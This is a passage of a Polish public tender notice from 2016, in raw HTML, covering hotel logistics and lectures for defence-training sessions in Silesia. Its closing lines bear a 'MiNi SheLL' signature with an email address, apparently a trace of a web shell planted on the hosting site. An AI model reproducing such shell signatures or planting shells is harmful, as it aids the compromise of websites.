              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>lokalizacja obiektu</td><td>30</td></tr><tr><td>liczba gwiazdekposiadanych przez hotel</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1)	zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)	dopuszcza się możliwość zmiany miejsca wykonywania przedmiotu zamówienia w sytuacji wystąpienia siły wyższej, która uniemożliwi wykonanie go we wskazanym w ofercie miejscu. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec. W szczególności za siłę wyższą będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź, zamieszki, wojna, zaproponowane nowe miejsce wykonywania przedmiotu zamówienia musi spełniać wszystkie warunki określone w opisie przedmiotu zamówienia  załączniki nr 1.1 - dotyczy zadania częściowego nr 1,
3)	dopuszcza się możliwość zmiany miejsca wykonywania przedmiotu zamówienia za zgodą Zamawiającego, przy czym Wykonawca musi zapewnić hotel/ośrodek/obiekt, spełniający wszystkie warunki określone w opisie przedmiotu zamówienia  załączniki nr 1.1 i/lub i/lub 1.2 (dotyczy zadań częściowych nr 1 i 2). Koszty wynikające z powyższej zmiany ponosi Wykonawca, wynagrodzenie, o którym mowa w  § 3 ust. 1 umowy nie ulega zwiększeniu,
4)	zmiany osoby wykonującej przedmiot zamówienia  z przyczyn niezależnych od Wykonawcy lub innych uzasadnionych okoliczności, za zgodą Zamawiającego, pod warunkiem, że osoba zaproponowana przez Wykonawcę będzie spełniała wszystkie wymagania określone przez Zamawiającego w opisie przedmiotu zamówienia  załączniki nr 1.2 i/lub 1.3 (dotyczy zadań częściowych nr 2 i 3).
5)	w sytuacji wyrażenia przez Zamawiającego zgody na zmianę terminu wykonania przedmiotu zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę,
6)	w sytuacji, gdy wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>kompleksowa usługa związana z zabezpieczeniem logistycznym organizowanych szkoleń obronnych w terminie: 25-28 października 2016 r. (25-26.10.2016 r.  1-sza grupa; 27-28.10.2016 r.  2-ga grupa).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest zakup usług związanych z zabezpieczeniem logistycznym organizowanych w dniach 25  28 października  2016 r. szkoleń obronnych pracowników zajmujących się realizacją zadań związanych z przygotowaniami obronnymi państwa w jednostkach samorządu terytorialnego. 

Termin wykonania zamówienia: 25-28 października 2016 r. 
Zamówienie będzie realizowane w dwóch grupach, max 100 osób, min. 60 osób w ramach jednej grupy, w terminach: 25-26.10.2016 r.  1-sza grupa; 27-28.10.2016 r.  2-ga grupa.

Miejsce: hotel/ośrodek/obiekt usytuowany w ramach jednego obiektu usługowego, o standardzie minimum trzygwiazdkowym potwierdzonym stosowną decyzją Marszałka Województwa Śląskiego, położony na terenie powiatu bielskiego, cieszyńskiego lub żywieckiego. 
Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 1, został określony w załączniku nr 1.1 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80550000-4, 55120000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 25/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>lokalizacja obiektu</td><td>30</td></tr><tr><td>liczba gwiazdek posiadanych przez hotel</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>przygotowanie i przeprowadzenie dwugodzinnego wykładu w terminach: 25 października 2016 r. oraz 27 października 2016 r. nt.  Analiza aktualnych zagrożeń dla bezpieczeństwa narodowego płynących z cyberprzestrzeni oraz Metody i narzędzia ochrony przed atakami mającymi na celu zakłócenie lub sparaliżowanie pracy systemów teleinformatycznych jednostek organizacyjnych administracji publicznej i przedsiębiorców realizujących zadania obronne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest zakup usługi związanej z zapewnieniem wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) w terminach: 25 października 2016 r. oraz 27 października 2016 r. 

Zamówienie będzie realizowane w dwóch grupach (max liczba uczestników w ramach jednej grupy   100 osób, min. 60 osób).

Przedmiotem zamówienia jest zapewnienie wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) dla grup nie przekraczających 100 osób  w następujących tematach:
Temat nr 1-  Analiza aktualnych zagrożeń dla bezpieczeństwa narodowego płynących z cyberprzestrzeni,
Temat nr 2  Metody i narzędzia ochrony przed atakami mającymi na celu zakłócenie lub sparaliżowanie pracy systemów teleinformatycznych jednostek organizacyjnych administracji publicznej i przedsiębiorców realizujących zadania obronne.

Miejsce realizacji zamówienia: 
Hotel/ośrodek/obiekt wybrany w drodze postępowania o udzielenie zamówienia publicznego (niniejsze postępowanie, zadanie częściowe nr 1).

Termin wykonania zamówienia:
25 października 2016 r. oraz 27 października 2016 r.
Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 2, został określony w załączniku nr 1.2 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80550000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 25/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>lokalizacja obiektu</td><td>30</td></tr><tr><td>liczba gwiazdek posiadanych przez hotel</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>przygotowanie i przeprowadzenie dwugodzinnego  wykładu w terminach: 26 października 2016 r. oraz 28 października 2016 r. nt.  Kodeks postepowania administracyjnego  omówienie najważniejszych nowelizacji ustawy z lat 2015-2016 oraz  Prawne aspekty nakładania świadczeń na rzecz obrony w drodze decyzji administracyjnej. Zasady wszczynania i prowadzenia postepowania administracyjnego oraz wydania decyzji administracyjnej przez uprawniony organ I instancji<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest zakup usługi związanej z zapewnieniem wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) w terminach: 26 października 2016 r. oraz 28 października 2016 r. 

Zamówienie będzie realizowane w dwóch grupach (max liczba uczestników w ramach jednej grupy   100 osób, min. 60 osób).

Przedmiotem zamówienia jest zapewnienie wykładowcy/wykładowców do przygotowania i przeprowadzenia dwugodzinnego wykładu (jeden temat 60 min) dla grup nie przekraczających 100 osób  w następujących tematach:
Temat nr 3  Kodeks postępowania administracyjnego  omówienie najważniejszych nowelizacji ustawy z lat 2015-2016,
Temat nr  4  Prawne aspekty nakładania świadczeń na rzecz obrony w drodze decyzji administracyjnej. Zasady wszczynania i prowadzenia postępowania administracyjnego oraz wydania decyzji administracyjnej przez uprawniony organ I instancji.

Miejsce realizacji zamówienia: 
Hotel/ośrodek/obiekt wybrany w drodze postępowania o udzielenie zamówienia publicznego (niniejsze postępowanie, zadanie częściowe nr 1).

Termin wykonania zamówienia:
26 października 2016 r. oraz 28 października 2016 r.
Szczegółowy opis przedmiotu zamówienia w zakresie zadania częściowego nr 3, został określony w załączniku nr 1.3 do SIWZ.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80550000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 26/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>lokalizacja obiektu</td><td>30</td></tr><tr><td>liczba gwiazdek posiadanych przez hotel</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com